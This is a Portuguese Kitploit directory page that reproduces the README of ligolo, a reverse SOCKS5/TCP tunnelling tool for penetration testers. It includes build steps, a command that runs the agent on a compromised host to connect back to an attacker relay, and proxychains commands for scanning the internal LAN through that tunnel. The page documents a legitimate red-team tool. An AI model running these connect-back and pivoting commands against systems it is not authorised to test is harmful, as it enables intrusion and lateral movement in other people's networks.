Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ligolo — Túnel reverso facilitado para pentesters, por pentesters https://sysdream.com/ | Kitploit
Ferramentas/GitHubGitHub/sysdream/ligolo
Movimento LateralTestes de PenetraçãoRed Teaming
GitHubsysdream/ligolo

ligolo

Túnel reverso facilitado para pentesters, por pentesters https://sysdream.com/

Ver Repositório
1.8k22761há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ligolo : Tunelamento Reverso facilitado para pentesters, por pentesters

forthebadge forthebadge

Ligolo

Índice

  • Introdução
  • Caso de uso
  • Demonstração Rápida
  • Desempenho
  • Uso
    • Configuração / Compilação
    • Como usar?
    • TL;DR
    • Opções
  • Funcionalidades
  • A Fazer
  • Licenciamento
  • Créditos

Introdução

Ligolo é uma ferramenta simples e leve para estabelecer túneis SOCKS5 ou TCP a partir de uma conexão reversa com total segurança (certificado TLS com curva elíptica).

É comparável ao Meterpreter com Autoroute + Socks4a, mas mais estável e rápido.

Caso de uso

Você comprometeu um servidor Windows / Linux / Mac durante sua auditoria externa. Este servidor está localizado dentro de uma rede LAN e você deseja estabelecer conexões com outras máquinas nesta rede.

Ligolo pode configurar um túnel para acessar os recursos do servidor interno.

Demonstração Rápida

Relé de uma conexão RDP usando Proxychains (WAN).

RDP

Desempenho

Aqui está uma captura de tela de um teste de velocidade entre dois hosts de 100mb/s (ligolo / localrelay). O desempenho pode variar dependendo do sistema e da configuração de rede.

Speedtest

Uso

Configuração / Compilação

Certifique-se de que o Go esteja instalado e funcionando.

  1. Obtenha o Ligolo e as dependências
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. Gere certificados TLS autoassinados (serão colocados na pasta certs)
make certs TLS_HOST=example.com

NOTA: Você também pode usar seus próprios certificados utilizando a opção TLS_CERT do make ao chamar build. Exemplo: make build-all TLS_CERT=certs/mycert.pem.

  1. Compilar
  • 3.1. Para todas as arquiteturas
make build-all
  • 3.2. (ou) Para a arquitetura atual
make build

Como usar?

Ligolo consiste em dois módulos:

  • localrelay
  • ligolo

Localrelay é destinado a ser executado no servidor de controle (o servidor atacante).

Ligolo é o programa a ser executado no computador alvo.

Para localrelay, você pode deixar as opções padrão. Ele escutará em todas as interfaces na porta 5555 e aguardará conexões do ligolo (parâmetro -relayserver).

Para ligolo, você deve especificar o endereço IP do servidor de relé (ou seu servidor de ataque) usando o parâmetro -relayserver ip:porta.

Você pode usar a opção -h para ajuda.

Uma vez que a conexão for estabelecida entre Ligolo e LocalRelay, um proxy SOCKS5 será configurado na porta TCP 1080 do servidor de relé (você pode alterar o endereço/porta TCP usando a opção -localserver).

Depois disso, tudo que você precisa fazer é usar sua ferramenta favorita (Proxychains, por exemplo), e explorar a rede LAN do cliente.

TL;DR

No seu servidor de ataque.

./bin/localrelay_linux_amd64

No host comprometido.

> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

Uma vez que a conexão seja estabelecida, defina os seguintes parâmetros no arquivo de configuração do ProxyChains (no servidor de ataque):

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

Lucro.

$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

Opções

Opções do Localrelay:

Usage of localrelay:
  -certfile string
    	The TLS server certificate (default "certs/server.crt")
  -keyfile string
    	The TLS server key (default "certs/server.key")
  -localserver string
    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
  -relayserver string
    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Opções do Ligolo:

Usage of ligolo:
  -autorestart
    	Attempt to reconnect in case of an exception
  -relayserver string
    	The relay server (the connect-back address) (default "127.0.0.1:5555")
  -skipverify
    	Skip TLS certificate pinning verification
  -targetserver string
    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

Funcionalidades

  • Túnel TLS 1.3 com fixação TLS (TLS pinning)
  • Multiplataforma (Windows / Linux / Mac / ...)
  • Multiplexação (1 conexão TCP para todos os fluxos)
  • Proxy SOCKS5 ou relé simples

A Fazer

  • Melhor tratamento de timeout
  • Suporte a UDP no SOCKS5
  • Implementar mTLS

Licenciamento

GNU General Public License v3.0 (Veja LICENSING).

Créditos

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

Sysdream

Baixar ferramenta